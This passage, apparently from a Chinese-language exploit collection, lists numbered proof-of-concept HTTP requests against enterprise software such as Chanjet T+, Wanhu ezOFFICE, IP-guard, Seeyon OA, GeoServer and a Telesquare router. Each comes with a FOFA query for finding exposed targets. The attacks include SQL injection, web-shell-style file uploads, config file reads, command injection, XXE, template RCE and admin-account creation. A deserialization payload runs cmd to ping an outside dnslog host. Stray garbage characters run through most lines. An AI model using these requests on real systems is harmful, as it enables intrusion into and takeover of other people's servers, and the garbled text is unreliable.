. E9 J9 j8 T8 H+ I/ o2 j% J" m "MethodName":"Start",
* E# A/ f/ ^8 t+ d4 l, N "ObjectInstance":{3 O4 S+ @" u5 g
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", C$ s# U+ i5 b7 e4 z) i! [
"StartInfo": {
% z S$ A0 _1 g" l; |+ R% Y8 V "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
/ Z+ n d/ l2 H8 ^ "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
. s! O) R" D8 T; F. L }2 |: o: x4 V; T
}# i/ @9 j3 e7 m r9 U
}* `5 w8 D" Y/ k/ l
}9 B8 J. a* a1 o- i3 g7 p: p
+ W5 T4 k3 a5 G7 E3 m6 H. `. }
/ [/ H' d/ i) S( B1 B) m57. 畅捷通T+ keyEdit.aspx SQL注入2 y9 p, T% I- H+ P- }0 L
FOFA:app="畅捷通-TPlus"& b6 E' k2 K5 L: l5 c
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
' s- {2 X1 D! n& u+ ?* Y0 z/ cHost: host
2 Y! ]8 j5 |. L6 o) D2 Q$ PUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36- s$ N; G- b/ T* [) W" m
Accept-Charset: utf-8: e! y% X6 j1 D
Accept-Encoding: gzip, deflate; s {, Q* _) J) A1 L
Connection: close4 h+ z7 \! x+ ` T8 _4 B
6 y9 ^9 ?3 {7 a. _ f M8 ?) ^. _
58. 畅捷通T+ KeyInfoList.aspx sql注入
7 {$ t8 u$ w c! b" XFOFA:app="畅捷通-TPlus"
; F$ g9 Y0 n) a4 LGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
. Q; o0 [3 V$ f! |' U$ t' E* eHost: your-ip
# J/ L, q# v& \( r% u2 TUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
. k. v, _ S. U2 r" u' A1 X% o, K, EAccept-Charset: utf-83 Z. N2 [3 d% W6 r1 J
Accept-Encoding: gzip, deflate
1 x/ C( I/ ^+ T. N- I, ^; d. BConnection: close
% ~! i ?; h# i/ g3 ~& n4 O- ^/ T& {* D- A
, _. l6 T2 k7 L2 {- g# _5 v59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行/ P) B* F$ F" c0 {* i7 d
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"5 J# t1 n" r$ s# u2 C- L# D' Q
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1* G# `7 n; S( g. M C
Host: 192.168.86.128:90905 B: n$ W1 M1 Y/ _2 M& d
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36) Y' N; a9 G- m2 o2 `: L" E& v
Connection: close: v1 W* D6 |1 u. y! i' P' g7 ]
Content-Length: 1669 A/ v( G2 Y( z- O+ ]1 y
Accept: */*
) s1 G- p) \9 r/ k3 G9 k0 VAccept-Language: en
$ M9 ]2 K* z8 BContent-Type: application/x-www-form-urlencoded& O4 F2 h' h' }( ~1 k c
Accept-Encoding: gzip. Z$ `! M+ c* W: q3 A( P, i
( x9 l3 e7 y. f, R4 j6 z8 ~1 aPAYLOAD
" A* q) H# V; @6 v( q$ \/ ^: J& e
+ c' K3 ] D* ^# S8 Q* C# I% j* N9 u u
60. 百卓Smart管理平台 importexport.php SQL注入1 m/ ]# v u: _; F& @3 o" S
FOFA:title="Smart管理平台"/ T/ } d7 a, z) C
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
* y: P; ]/ ~0 B" g1 e X* [+ sHost:
0 `* O" P9 Y( A- [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36$ }0 ^: z9 ^2 [( A& ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) {; R4 A S9 {4 A9 X; {
Accept-Encoding: gzip, deflate2 w3 a2 m3 d7 U' J- P1 F' v
Accept-Language: zh-CN,zh;q=0.9
" M, l1 _3 |4 D: ^; ]Connection: close
3 |; N0 \6 J/ Q* s& m/ x: \6 S; }
6 e* T& B* ^2 c R( N; ]; S
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
+ J1 ~* @2 m: b, TFOFA: title="欢迎使用浙大恩特客户资源管理系统"1 h& M8 |, F0 @+ b
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
; C& ^2 `9 F, d* l5 c' P, @Host: x.x.x.x
: a( e7 G0 @% NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ `) y4 x) L5 w4 U# N5 A) M
Connection: close
) k5 W; q6 o& |0 GContent-Length: 27
8 T% a0 l) c: G# @# d! ]Accept: */*
# x& L9 C" ^1 XAccept-Encoding: gzip, deflate
0 B; _% l V( K9 B- M: D" m; c( s1 zAccept-Language: en7 J( s5 z; H/ P1 @
Content-Type: application/x-www-form-urlencoded% ?; M. h1 j; r- G- j8 I# ~
& U9 s, F6 y7 B( W* S. g
8uxssX66eqrqtKObcVa0kid98xa
8 n1 F8 v! k( f
5 c! }2 Q0 N& Q, X: ?1 R# O6 Q) v3 M2 ~) R
62. IP-guard WebServer 远程命令执行6 e: m# G* {# |8 ~, w8 C
FOFA:"IP-guard" && icon_hash="2030860561"
4 z9 s! Q- h( M7 ~! m9 jGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
v! C, |) a1 p- a2 y; fHost: x.x.x.x; S0 x& V7 ^4 w3 @
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36) o0 P: `9 V: L* z1 g- o' l$ N
Connection: close$ O# o3 n( ^* v9 ]3 E3 t! Q$ p$ D) i
Accept: */*
4 k! |* y. ^4 Z: uAccept-Language: en
7 b7 ~% D8 O( a& gAccept-Encoding: gzip
) j9 W6 U6 Q9 G1 j/ V' A
8 i/ J# H# v$ V9 F$ d6 u" N& ^" O7 h* i6 a/ w# t2 q2 _
访问
/ @8 d2 z9 j) q$ H& G) E# B2 I2 }4 s$ ]. I# v2 `7 C
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1+ w" Z7 Y. q' \. B
Host: x.x.x.x3 @3 k7 R, C( i+ E% n
2 K0 S4 o5 A/ D: [3 a) ?7 v1 Q2 [- ~' _, B
63. IP-guard WebServer任意文件读取1 p, e; T6 h9 t. i# a
IP-guard < 4.82.0609.0
# \" P" w0 l* p$ ^$ h% O. EFOFA:icon_hash="2030860561"7 g, P2 \, J. J6 b
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
- o4 V/ p( Y& A7 {: w( F( ?: iHost: your-ip
' P- d6 K/ ?7 y4 B/ n. z7 i* vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
; M/ x$ z! p; [/ p/ G, Q5 y. fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( W8 A# p( i2 P; LAccept-Encoding: gzip, deflate
: J3 R, r }( q& E3 Z2 F0 GAccept-Language: zh-CN,zh;q=0.9
; ^. Y9 W; o1 w: vConnection: close" o. U7 N4 |$ d3 k
Content-Type: application/x-www-form-urlencoded
& i9 m: D& i9 R; ^ k! {% R% y5 O+ B+ |4 ~' [. I6 v- h T
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A+ }6 m Y) b8 q5 V
( |9 ?. G7 V6 G
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
& Q, A, Z" k) l2 m3 vFOFA:body="/Scripts/EnjoyMsg.js"; \/ e0 Y+ _9 @5 |# h
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
) m- `" r' K3 ^5 |* UHost: 192.168.86.128:90016 n( d) O- B: B
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36. K1 U' W0 @6 n3 r
Connection: close/ g/ ?+ m" F) R! o& y" T
Content-Length: 3697 c; |8 A3 p) w6 E# D
Accept: */*! y$ z4 H6 T1 j; t3 O9 Q9 a/ x
Accept-Language: en
( ?3 H6 }' B- R6 x+ kContent-Type: text/xml; charset=utf-8
$ \5 x2 n9 k! C, rAccept-Encoding: gzip. X2 m+ [, c) l: ~5 Z
( ]: w& j) f" N3 ~. b4 f5 H; e. t, X<?xml version="1.0" encoding="utf-8"?>) c+ Q0 R9 O7 G; \* b, ~0 M
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">% _0 y4 k6 A* U% K5 I0 Z
<soap:Body>
: j- p; x; ?6 z( [ <GetOSpById xmlns="http://tempuri.org/">
3 s; V" _2 V) Y ~1 @) K. _ <sId>1';waitfor delay '0:0:5'--+</sId>
9 G3 E! ~! t* Z. t; l L1 y </GetOSpById>
4 o8 m9 F% ]* A </soap:Body>
6 Z: b4 k/ g8 M</soap:Envelope>+ d7 d/ a2 ]( ~7 ~5 E, O7 g. m/ @
/ s# `# y# \1 B
4 w+ b3 j" p6 m9 j+ q- o' I65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
: Q; [: ^4 @2 _! U0 I8 z# b+ q+ BFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
, e+ s8 U' W+ x4 d4 K响应200即成功创建账号test123456/123456% n1 k! y) S7 L5 `6 N/ `9 s7 @
POST /SystemMng.ashx HTTP/1.1
# i' X7 F3 _$ l" r' jHost:
9 J9 Z) b, D9 ^. X, Q% nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
% }/ e. e- H& E rAccept-Encoding: gzip, deflate
1 X H$ s' @4 F7 N4 T) u) r. _Accept: */*
0 ~* \* R" V ]. b' G) aConnection: close9 S) ?) U9 P6 `! ]6 r b
Accept-Language: en$ p5 l) D; Y K1 c9 a5 W* l
Content-Length: 1747 {( I9 r: M! T r6 y, Q; G% [5 r
0 s$ R) Y; _ `% c
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
6 [& b$ r i/ S: }! w* S4 S+ c1 ^9 c% m l0 M1 w% ~8 k
6 F, l' V# ^* C) D# I
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
- c) B0 L7 _3 O) y* tFOFA:app="万户ezOFFICE协同管理平台"( A) u4 C9 M& @5 _" N
D; Y7 ]# {( s2 y9 z* |1 kGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
6 v/ X9 q) v5 A+ H% E8 BHost: x.x.x.x
3 e( S6 g O, Z9 O5 m. u, |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.361 W1 D8 `! r7 D+ G/ t
Connection: close
/ z- ?" d5 i* qAccept: */*& ^% ~# C$ F& Y6 W+ H6 M& t6 [
Accept-Language: en3 @* j T# R# ^2 p
Accept-Encoding: gzip% s$ e* n) b2 P5 k/ r( [6 f$ @( Z% g
' C$ z# l! t7 F# a B* F; K1 Q: v4 `" P
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
5 _# X' X* h3 ^5 x! U* }" @3 q! x2 d+ c' e A! O
67. 万户ezOFFICE wpsservlet任意文件上传* W7 o6 E. q( S! f; O" e
FOFA:app="万户网络-ezOFFICE"2 B+ l" m+ [; H, d3 I
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
/ Q6 [4 M1 q9 Y1 r& E/ ?POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
0 b1 u1 v' m: ?5 tHost: x.x.x.x& g2 Z8 E2 g, n7 V. I, l9 ]% w
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
0 y _7 E$ Q& b1 j# pContent-Length: 173
1 D% ~9 F& b1 w6 T% |2 r qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
% b' h" S8 O, _7 c$ F3 m0 N5 `Accept-Encoding: gzip, deflate9 m! D0 ~7 i0 d3 ?$ [) e
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3* D% E- w$ w; v& u& h% h6 {
Connection: close
) E% N4 x7 t/ Z- w5 R7 O" N$ LContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
' o0 s* w) w' v9 PDNT: 1
% k7 d. w3 J# r+ R* T; L8 _& cUpgrade-Insecure-Requests: 1& m; v V' J+ H' b
( [8 d2 e$ {( @0 e8 b3 k--ufuadpxathqvxfqnuyuqaozvseiueerp, U1 y3 u) b7 z! l* r5 A+ Q! u
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
' G7 c- i0 S6 m9 D: |! v% U; ? k! Z3 v0 S
<% out.print("sasdfghjkj");%>! x( A1 d- v, @
--ufuadpxathqvxfqnuyuqaozvseiueerp--
n' u% J+ S: @0 y
: _, `+ v) f* k- K5 R2 E b, x% d- p5 T. h4 f/ {
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
- N- s* ^) I; X# H* e5 s2 N! F% S" p" S& I# m) b, X
68. 万户ezOFFICE wf_printnum.jsp SQL注入. C' a) m0 }& E2 t! i$ x R+ Z
FOFA:app="万户ezOFFICE协同管理平台"
1 |3 P: R+ d( A$ h/ e( aGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1- L* m/ X# p( e& {9 b8 n- K( Q$ [
Host: {{host}}, y0 z& u: T3 a, T% r$ |; }+ e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
9 O4 a3 W& q) @5 y& kAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
$ |( Y$ ^- R6 y. QAccept-Encoding: gzip, deflate! C/ ]( w9 _3 H/ S9 e
Accept-Language: zh-CN,zh;q=0.9/ o& ?$ r, n- I% U' C' U
Connection: close% w5 K3 |8 G$ o/ O* n
4 Y/ t0 j3 a! q4 K' y q) P
b. R4 p0 t) q5 w5 o69. 万户 ezOFFICE contract_gd.jsp SQL注入! A; w+ U. {- l$ Q
FOFA:app="万户ezOFFICE协同管理平台"9 l" s" A, ]6 r& |8 p/ a
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.13 O9 A; w% x' N) } J( Y
Host: your-ip/ L# ^' H1 }2 q+ `2 A
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
: t2 q F) ^4 m9 H, U; ?5 g& Q0 V- m2 HAccept-Encoding: gzip, deflate
2 L4 R U/ l# a+ MAccept: */*
) Y. R# }8 O( T# T7 XConnection: keep-alive& ~; B9 x: @: X$ d& V! O& w1 V
9 k- v* }$ ]- p, x7 D! A4 z5 _, l8 u. O* L* @
70. 万户ezEIP success 命令执行( ?% n4 z+ ^. n: e8 Z
FOFA:app="万户网络-ezEIP"5 ~0 K, ]* X1 n8 j* E$ v+ n
POST /member/success.aspx HTTP/1.1
& l6 w& e1 g: M5 H3 i. h* O0 ~9 hHost: {{Hostname}}
" K e( @0 }' \6 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
: _; v" F7 G% V1 B) d3 c. pSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=+ H% w6 K+ U* \- Y& }1 s
Content-Type: application/x-www-form-urlencoded
- ?: Y/ M5 {2 b/ b! `5 e; ATYPE: C
0 x8 J1 b2 A9 `( Y* n/ U) CContent-Length: 16702
8 o- _- H( A& ^8 ~
& F$ ]/ J+ g: J" u__VIEWSTATE=PAYLOAD
$ k+ e8 P% x ?' R8 o2 b# u! l/ [3 v2 T* }# y! N+ n) k% d) X
]- v {) H$ O: a3 C
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
2 A0 k, \* b( C2 C* iFOFA:body="PM2项目管理系统BS版增强工具.zip"0 M1 m/ U* _( O C! w: u
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.14 G% p, p; K; O4 \$ i
Host: x.x.x.xx.x.x.x
5 ]$ _9 ~& j3 q* o; lUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
( S% @5 {8 Z6 S9 IConnection: close! o2 ?- c8 q W- U6 c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 W1 y0 v) E; dAccept-Encoding: gzip, deflate
$ a: n$ R5 B9 }: _+ W0 B8 u0 J8 y4 uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# J1 ]4 M) P# E7 `$ j1 @
Upgrade-Insecure-Requests: 1
5 x# h* q' L2 g7 K" x7 V: b) J7 ]& Z3 d+ [% H# y* N6 F+ N
1 y* c+ i6 _" T
72. 致远OA getAjaxDataServlet XXE
2 @- V# ^4 A5 r' |, KFOFA:app="致远互联-OA"+ B0 u w8 y; N6 c0 Y
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
) P% X( A, P1 e: @' pHost: 192.168.40.131:8099
4 M @ x9 ^( DUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36- H; C8 L. i0 b/ k C
Connection: close
+ j& \5 P- |! oContent-Length: 583) N& l0 I' _! z! j7 B
Content-Type: application/x-www-form-urlencoded
& H9 w& m9 s4 G9 j+ l! b0 L& ?# N PAccept-Encoding: gzip. z; n% k/ F: T7 M8 y9 m
]0 D: J5 F$ l' rS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
! s- u6 D9 I( R' n# b6 H# a! R7 ?2 @5 E0 Q8 m. I
$ V, J+ d/ M0 c& E2 A" S1 M ?73. GeoServer wms远程代码执行
& q4 d7 ~$ ~5 v* uFOFA:icon_hash=”97540678”
3 P8 y* Z& p6 L3 rPOST /geoserver/wms HTTP/1.1/ f7 B# e& U F) X K
Host:
?6 o% o5 q" D+ |1 @) b3 vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.368 y. j; T! M* ~) x9 v- I" a
Content-Length: 19817 F5 I2 Q! P# h7 r
Accept-Encoding: gzip, deflate
- J/ i. G7 Z1 b i% EConnection: close
8 ^( A, d4 c/ x+ W ~/ {( V/ v* HContent-Type: application/xml
3 n q7 F0 m1 A3 YSL-CE-SUID: 39 n% a2 z+ d2 B! J# V0 M
, R+ U2 p8 }& H8 C; M7 r. B' d! dPAYLOAD) ~. B! \" D/ Z) \- `
; h6 u# Q X2 Q
; B/ G+ `/ i* |+ K74. 致远M3-server 6_1sp1 反序列化RCE
; S l4 J: h* jFOFA:title="M3-Server"1 f! Q( ]4 p! R2 T! g! T9 g7 u& k
PAYLOAD! K$ Z% k/ v8 { o/ o( I6 A
% b; F/ M" q) V& p" j8 Q% j75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE& Z' j- [- l# C1 ^' Q0 u1 n# E
FOFA:app="TELESQUARE-TLR-2005KSH"; [! g0 S$ e1 M1 S- ~+ Q8 @# k6 {
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
|- F4 u2 N0 P( pHost: x.x.x.x! W2 b0 G3 ?4 @) P: {1 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) Y! ]0 i5 Q( C+ p$ C
Connection: close# ?# w; _5 |2 L8 _$ v/ z7 T
Accept: */*
/ l1 j4 ]; p' O8 q8 }2 J k* ^5 DAccept-Language: en7 y4 V9 L/ z' {" J# _; ~! K
Accept-Encoding: gzip
7 J/ T; f# L3 h; S1 }
7 \) s( k* Q# b1 f! V
& @) j6 x7 m8 \8 z/ }3 E' u4 fGET /cgi-bin/test28256.txt HTTP/1.1
: l! X4 o. J4 J! N0 VHost: x.x.x.x# ~4 }' T5 o- _, @6 }0 b: J
9 W: b6 H+ D8 W/ A% h, }) S& i
; ?; _0 T2 j# |76. 新开普掌上校园服务管理平台service.action远程命令执行
# F x2 _( i) X2 SFOFA:title="掌上校园服务管理平台"
9 S: P1 I; j6 E0 j" r3 G$ } BPOST /service_transport/service.action HTTP/1.1+ t0 r1 ?* K; y- G2 z" K
Host: x.x.x.x
( V) p4 q0 W- E' SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
1 }2 J e: [$ w+ C/ aConnection: close
/ m8 _9 t Z+ J" Q5 SContent-Length: 2115 s# b1 W- g% S: `% |3 w# p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, q5 y6 Y. Y8 w1 ?' o3 y Q
Accept-Encoding: gzip, deflate0 @& y5 ?7 ~9 j' f" s" J4 q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* t2 E1 x* k% ]/ P QCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
, `# b7 k5 ?" n' z2 S5 X' qUpgrade-Insecure-Requests: 15 z( z1 c0 W0 }$ z6 l' N- L `0 O
* Q: |! {7 q E- I! x! p
{
. t" O! D g2 x"command": "GetFZinfo",0 Z1 X2 P D; R
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
8 g: O' W3 ]4 \! q6 v6 q$ Q. | ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
4 p; N; x8 v0 z( r; ~1 s}
$ w+ X+ P" Z7 O) x/ }1 ~3 A/ |' _8 ^
* j0 ~' a6 b8 B9 o# ]) t3 rGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
2 r0 |: w& o4 q" A% pHost: x.x.x.x \: M+ C6 q4 l0 a, l
9 ~3 P" @$ F7 z7 _# ?
% J# D" m3 I1 B
4 ?* S1 e: z+ O+ H# a0 x1 q+ L77. F22服装管理软件系统UploadHandler.ashx任意文件上传0 T; G, ^- y/ |) x" G
FOFA:body="F22WEB登陆"
& C- a+ Z5 Q( ?& l0 ZPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1' @6 r1 }+ g0 ^! C: W' E7 y: E
Host: x.x.x.x- |! A) N+ j& o3 a. }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36& j6 m5 w4 E* y+ g, |. J8 ^6 W
Connection: close
) r" r4 ^/ S8 d+ B* b9 o; [; ~Content-Length: 4333 b' w/ k2 g7 a5 g- c7 F
Accept: */*; s# W3 ~; ?$ Q1 M* Y
Accept-Encoding: gzip, deflate
& z+ @& U6 R. T; S+ M& dAccept-Language: zh-CN,zh;q=0.9
/ G* |; M6 ^1 G, SContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
5 x( l! G* @4 J: _( w2 K+ }$ F" i! @6 \7 k
------------398jnjVTTlDVXHlE7yYnfwBoix
5 u/ @0 F v1 h4 WContent-Disposition: form-data; name="folder"
" f! Y8 @& v& @, z7 w. s7 q& M) z" `6 G
/upload/udplog4 Z0 c- Y" @* Y8 B* T4 I" o* g% P
------------398jnjVTTlDVXHlE7yYnfwBoix1 |% u* X* G h7 Z
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
8 l$ y5 g( `! S1 g' uContent-Type: application/octet-stream
4 N. f/ @; o# g6 H- ^4 @# C: N! l9 M G2 j8 X; }
hello1234567
2 t) C) @5 V" c: [" v2 h5 k------------398jnjVTTlDVXHlE7yYnfwBoix
$ d% ~8 \0 D, Y' m! _- gContent-Disposition: form-data; name="Upload"
! g3 e% T' Y8 \! z
2 r/ ]! e8 t# ySubmit Query3 Y6 ?1 X, A n/ y* l
------------398jnjVTTlDVXHlE7yYnfwBoix--
" K6 U# B6 |+ Z+ H) k# _$ Y2 I5 b, S8 ?, b2 |& W' G- m _( ~
$ g# ?. Y3 ]% E: s$ B78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
# h1 M- d9 `' d* |FOFA:icon_hash="2001627082"
! l9 C* N; A4 Z8 s5 IPOST /Platform/System/FileUpload.ashx HTTP/1.1' M8 ^) ~9 M) G& ^, \9 y! A8 x
Host: x.x.x.x; o3 y' B- c0 `( X; X5 C) T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 ~) E9 l6 e3 A, p$ u) w
Connection: close
3 ?: p; R/ ^# HContent-Length: 336: n! @/ c( v: C
Accept-Encoding: gzip2 c# q& I9 t; `# X
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l) ~. b/ H0 Q. h3 J
J8 x, F( K, W- P8 k% X8 u% g+ {------YsOxWxSvj1KyZow1PTsh98fdu6l0 d1 z- E4 Z+ V8 i; W8 v3 V# s
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
+ p9 n' N) Y; {+ `" nContent-Type: image/png9 J+ U" L8 r6 d2 ^4 N$ a
5 f; Q5 w# b3 j. Y9 z- J7 wYsOxWxSvj1KyZow1PTsh98fdu6l* S* l2 J) w# g: V. f9 W
------YsOxWxSvj1KyZow1PTsh98fdu6l, B! f1 i6 J3 _& Y7 F
Content-Disposition: form-data; name="target"
, d4 ]6 X( P0 g1 P# |, ]' X' [
& w b4 l5 [2 a9 g7 R/Applications/SkillDevelopAndEHS/
0 D2 f. ?! H% A------YsOxWxSvj1KyZow1PTsh98fdu6l--& `# r2 @$ `( e4 h w* Y
9 f% j$ u) P% ]; W* A# \: A7 l9 N2 d \& @
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
- Z1 v3 A9 `5 G) Z* d9 ^5 MHost: x.x.x.x e" \) B: h x$ j; D A: ]
/ O1 \9 C H' x% F' f6 a
